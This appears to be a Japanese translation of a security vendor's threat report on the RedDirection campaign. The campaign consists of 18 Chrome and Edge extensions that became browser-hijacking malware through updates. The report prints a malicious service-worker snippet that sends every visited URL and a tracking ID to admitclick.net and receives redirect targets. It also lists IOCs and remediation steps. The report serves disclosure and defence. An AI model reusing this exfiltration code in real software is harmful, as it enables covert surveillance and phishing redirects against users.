Google と Microsoft のお墨付きを得ていた230万ユーザーがインストールしたそれらは、実はマルウェアでした

要点:1つの「認証済み」カラーピッカー拡張機能を調査した結果、Chrome と Edge にまたがる230万人ものユーザーを感染させた、18個の悪意ある拡張機能による連携型キャンペーンが明らかになりました。

Google の認証バッジが付き、10万件以上のインストール数、800件以上のレビュー、ストア内でのおすすめ表示まである Chrome 拡張機能——それだけで信頼できると思いますか?もう一度考え直してください。

「Color Picker, Eyedropper — Geco colorpick」をご紹介します。この拡張機能は、私たちが日頃頼りにしている信頼シグナルを高度な脅威アクターがどう悪用しているかを見事に示す一例です。週末に雑に作られたような、あからさまな詐欺拡張機能ではありません。約束通りの機能(実用的なカラーピッカー)を提供しながら、同時にブラウザを乗っ取り、訪問するあらゆるウェブサイトを追跡し、常時稼働のコマンド&コントロール(C2)バックドアを維持する、緻密に作り込まれたトロイの木馬です。しかもこの拡張機能は、バージョンアップデートを通じて悪意あるものへと変貌するまで、何年もの間まっとうなものであり続けていました。

驚くのはまだ早いです。RedDirectionキャンペーンをご紹介します。Color Picker 拡張機能の調査は、氷山の一角に過ぎませんでした。コマンド&コントロールのインフラを分析し、類似のコードパターンを追跡した結果、私たちが「RedDirection」と呼ぶキャンペーンの全貌が明らかになりました。これは Chrome と Edge の両ストアにまたがる18個の悪意ある拡張機能から成る、高度なクロスプラットフォームネットワークであり、いずれも同一のブラウザ乗っ取り機能を共有しています。これら18個の拡張機能を合わせると、両ブラウザで230万人以上のユーザーが感染しています。これは私たちがこれまで確認した中でも最大級のブラウザ乗っ取り工作です。

これらの拡張機能は、絵文字キーボード、天気予報、動画速度コントローラー、Discord や TikTok 向け VPN プロキシ、ダークテーマ、音量ブースター、YouTube のブロック解除ツールなど、多岐にわたるカテゴリーの人気生産性・エンターテインメントツールを装っています。それぞれが謳い文句通りの機能を提供する一方で、私たちが Color Picker で発見したのと同じブラウザ監視・乗っ取り機能を密かに実装していました。

これらの拡張機能のうち複数は、Chrome ウェブストアと Microsoft Edge アドオンストアの両方で認証済みステータスやおすすめ表示を獲得しており、セキュリティ上の不備が両方の主要ブラウザマーケットプレイスに及んでいることを示しています。各拡張機能はそれぞれ独自のコマンド&コントロール用サブドメイン(admitclick.net、click.videocontrolls.com、c.undiscord.com など)を運用しており、一見別々の運営者によるもののように見えますが、実際には両プラットフォームにまたがる同一の集中管理型攻撃インフラの一部です。

これらの拡張機能は実際に何をしていたのか

タブが更新されるたびに発動するブラウザ乗っ取り

このマルウェアは、新しいページに移動するたびに作動する高度なブラウザ乗っ取り機構を実装しています。拡張機能のバックグラウンドサービスワーカー内には、すべてのタブの動作を監視するコードが隠されていました。

chrome.tabs.onUpdated.addListener(function() {
var t = o(r().mark((functiont(e, o, i) {
// Malicious code that sends your current URL to remote serverreturn r().wrap((function(t) {
for (;;) switch (t.prev = t.next) {
case0:
if (!o.url) {
                    t.next = 8;
break;
                }
return c = {
method: "POST",
redirect: "follow"                }, t.next = 5, fetch("https://admitclick.net/api?key=565ebded7e63cdfa5fcbe5734bdb4281a85d6f21&uuid=" + a + "&allowempty=1&out=" + encodeURIComponent(o.url) + "&format=txt&r=" + Math.random(), c)

あるウェブサイトを訪問するたびに、この拡張機能は以下を行います。

  1. 訪問中のページの URL を取得
  2. その URL を固有の追跡 ID とともにリモートサーバーへ送信
  3. コマンド&コントロールサーバーからリダイレクト先候補の URL を受信
  4. 指示があればブラウザを自動的にリダイレクト

当初はマルウェアではなかった——しかし、いつしかそうなった

これらは最初から悪意ある拡張機能だったわけではありません。マルウェアは、拡張機能のライフサイクルの中でのバージョンアップデートを通じて後から仕込まれました。それぞれのコードベースは、マルウェアが実装される前は何年もの間、非常にクリーンな状態を保っていたケースもあります。

Google と Microsoft のブラウザ拡張機能アップデートの扱い方が原因で、これらの悪意あるバージョンは、両プラットフォーム合わせて230万人以上のユーザーに対してサイレントに自動インストールされました。そのほとんどのユーザーは何もクリックしていません。フィッシングもソーシャルエンジニアリングも一切ありませんでした。ただ、信頼された拡張機能に静かなバージョンアップが加えられ、生産性ツールが監視マルウェアへと姿を変えただけです。

Google も Microsoft も、更新パイプラインを「精査」ではなく「規模」に最適化して構築していました。認証済みステータス、おすすめ表示、シームレスな展開——本来ユーザーの安全を守るためのはずのこれらの仕組みが、マルウェアの拡散を助長してしまったのです。これは例外的な事態ではなく、サプライチェーンの大惨事です。

完璧なトロイの木馬

RedDirectionキャンペーンを特に厄介なものにしているのは、正体を隠しながら堂々と存在し続ける包括的な手法です。18個の拡張機能はそれぞれ、宣伝通りの機能を正確に果たしていました。色を選ぶにせよ、動画速度を制御するにせよ、天気予報を提供するにせよ、音量を上げるにせよ、ユーザーが期待する通りの本格的な機能を提供していたのです。しかし、こうした正当な見せかけの裏には、生産性ツールのエコシステム全体にわたって、ブラウジングセッションのあらゆる瞬間を武器化しうる巧妙な乗っ取り機構が潜んでいました。

次のようなシナリオを想像してみてください。Zoom の会議招待を受け取り、リンクをクリックします。すると会議に参加する代わりに、悪意ある拡張機能の1つがリクエストを横取りし、会議に参加するには「重要な Zoom アップデート」をダウンロードする必要があると謳う、よくできた偽ページへリダイレクトします。正規のソフトウェアに見えるものをダウンロードしますが、実際にはシステムに追加のマルウェアをインストールしてしまい、最悪の場合マシン全体の乗っ取りやデバイスの完全な侵害につながりかねません。

あるいは、銀行のウェブサイトにログインする場面を想像してください。拡張機能がそのリクエストを捕捉し、攻撃者のサーバー上にホストされた、あなたの銀行のログインページを寸分違わず再現した偽サイトへシームレスにリダイレクトします。自分の口座に安全にアクセスしていると思い込んだままログイン情報を入力しますが、実際にはサイバー犯罪者に銀行情報をそのまま渡してしまうことになります。

これらは理論上の攻撃ではありません。18種類の異なる拡張機能を通じて230万人のユーザーが監視下に置かれている状況では、このキャンペーンはいつでも悪用しうる大規模かつ持続的な中間者攻撃(man-in-the-middle)の能力を生み出します。あらゆるクリック、あらゆるウェブサイト訪問、あらゆるオンライン取引が、この広大なネットワークを通じた潜在的な攻撃経路となるのです。攻撃者は個々のウェブサイトを侵害したりフィッシングメールに頼ったりする必要すらありません。信頼されたツール群を通じて、すでにユーザーのブラウザ自体を侵害済みだからです。

直ちに取るべき対応

もしRedDirectionキャンペーンの対象拡張機能をインストールしている場合は、以下を実施してください。

  1. Chrome と Edge から該当する拡張機能をすべて直ちに削除
  2. ブラウザデータを消去し、保存されている追跡用識別子を削除
  3. システム全体のマルウェアスキャンを実行し、追加の感染がないか確認
  4. 機密性の高いサイトを訪問していた場合は、不審な動きがないかアカウントを監視
  5. 提供された IOC を用いて、インストール済みの全拡張機能に同様の不審な挙動がないか確認

全体像

RedDirectionキャンペーンは、個々の拡張機能の問題にとどまらない、マーケットプレイスのセキュリティにおける構造的な欠陥を浮き彫りにしています。

  • 大規模な検証体制の限界:Google と Microsoft の検証プロセスは、18種類もの拡張機能にまたがる巧妙なマルウェアを検知できず、むしろ認証バッジやおすすめ表示を通じて複数の拡張機能をユーザーに積極的に薦めてしまっていました。
  • サプライチェーンの乗っ取り:このキャンペーンは、攻撃者が新規に悪意ある拡張機能を作成する、あるいは以前は正当だった拡張機能を悪意あるアップデートを通じて武器化するという、いずれの手法によっても拡張機能エコシステムを侵害しうることを示しています。
  • 信頼シグナルの武器化:攻撃者は、認証バッジ、インストール数、おすすめ表示、長年の正当な運用実績、好意的なレビューなど、ユーザーが頼りにするあらゆる信頼シグナルの悪用に成功し、プラットフォーム自身の信用構築の仕組みをユーザーに対する攻撃手段へと転用しました。

では、これからどうすべきか

RedDirectionキャンペーンは、ブラウザ拡張機能セキュリティにおける転換点を象徴する出来事です。18個の拡張機能を通じて230万人以上が感染したという事実は、単なるマルウェアの新たな発見にとどまらず、現在のマーケットプレイスにおけるセキュリティモデルが根本的に破綻していることの証明でもあります。攻撃者は Google と Microsoft の審査プロセスをただすり抜けただけでなく、大規模に組織的に悪用し、マーケットプレイス自体を高度な監視マルウェアの配布基盤へと変えてしまいました。

このキャンペーンは、脅威アクターが個別の攻撃にとどまらず、活動を開始するまで何年も休眠状態を保てる包括的なインフラを構築する方向へと進化していることを示しています。正当な機能性、段階的な展開、多様な拡張機能カテゴリーという組み合わせが完璧な状況を作り出し、ユーザーを守るために設計されたあらゆるセキュリティ機構をすり抜けてしまったのです。

本レポートはKoi Securityのリサーチチームが、健全な猜疑心と、より安全なオープンソースエコシステムへの願いを込めて執筆しました。

驚くべきことに、私たちがこの調査結果全体を明らかにしたのは、MITRE が最新カテゴリーである「IDE 拡張機能」を導入したわずか数日後のことでした。このことは、この領域の防御の重要性をさらに際立たせています。

長きにわたり、しばしば最高権限で動作する信頼できないサードパーティ製コードの利用は、企業にとっても攻撃者にとっても見過ごされてきました。しかし、その時代は終わりを迎えつつあります。潮目は変わってきています。

私たちは、実務者にも企業にも対応できるよう、この瞬間に向けて Koi を構築してきました。私たちのプラットフォームは、Chrome ウェブストア、VSCode、Hugging Face、Homebrew、GitHub などのマーケットプレイスからチームが取り込むあらゆるものを発見し、評価し、統制する手助けをします。

Fortune 50 企業や大手金融機関(BFSI)、世界有数のテック企業からも信頼を得ている Koi は、この広大な攻撃対象領域全体にわたって可視性を確保し、統制体制を確立し、リスクを事前に低減するために必要なセキュリティプロセスを自動化します。

私たちのソリューションに興味を持たれた方、あるいはすぐに行動を起こしたい方は、デモを予約するか、こちらからお気軽にご連絡ください 🤙

さらなる続報も間もなく控えていますので、どうぞご期待ください。

IOC(侵害指標)

拡張機能 ID

Chrome:

  • kgmeffmlnkfnjpgmdndccklfigfhajen — [Emoji keyboard online — copy&past your emoji.]
  • dpdibkjjgbaadnnjhkmmnenkmbnhpobj — [Free Weather Forecast]
  • gaiceihehajjahakcglkhmdbbdclbnlf — [Video Speed Controller — Video manager]
  • mlgbkfnjdmaoldgagamcnommbbnhfnhf — [Unlock Discord — VPN Proxy to Unblock Discord Anywhere]
  • eckokfcjbjbgjifpcbdmengnabecdakp — [Dark Theme — Dark Reader for Chrome]
  • mgbhdehiapbjamfgekfpebmhmnmcmemg — [Volume Max — Ultimate Sound Booster]
  • cbajickflblmpjodnjoldpiicfmecmif — [Unblock TikTok — Seamless Access with One-Click Proxy]
  • pdbfcnhlobhoahcamoefbfodpmklgmjm — [Unlock YouTube VPN]
  • eokjikchkppnkdipbiggnmlkahcdkikp — [Color Picker, Eyedropper — Geco colorpick]
  • ihbiedpeaicgipncdnnkikeehnjiddck — [Weather]

Edge:

  • jjdajogomggcjifnjgkpghcijgkbcjdi — [Unlock TikTok]
  • mmcnmppeeghenglmidpmjkaiamcacmgm — [Volume Booster — Increase your sound]
  • ojdkklpgpacpicaobnhankbalkkgaafp — [Web Sound Equalizer]
  • lodeighbngipjjedfelnboplhgediclp — [Header Value]
  • hkjagicdaogfgdifaklcgajmgefjllmd — [Flash Player — games emulator]
  • gflkbgebojohihfnnplhbdakoipdbpdm — [Youtube Unblocked]
  • kpilmncnoafddjpnbhepaiilgkdcieaf — [SearchGPT — ChatGPT for Search Engine]
  • caibdnkmpnjhjdfnomfhijhmebigcelo — [Unlock Discord]

ネットワーク指標

  • admitab[.]com
  • edmitab[.]com
  • click.videocontrolls[.]com
  • c.undiscord[.]com
  • click.darktheme[.]net
  • c.jermikro[.]com
  • c.untwitter[.]com
  • c.unyoutube[.]net
  • admitclick[.]net
  • addmitad[.]com
  • admiitad[.]com
  • abmitab[.]com
  • admitlink[.]net

翻訳元: https://www.koi.ai/blog/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware

ソース: koi.ai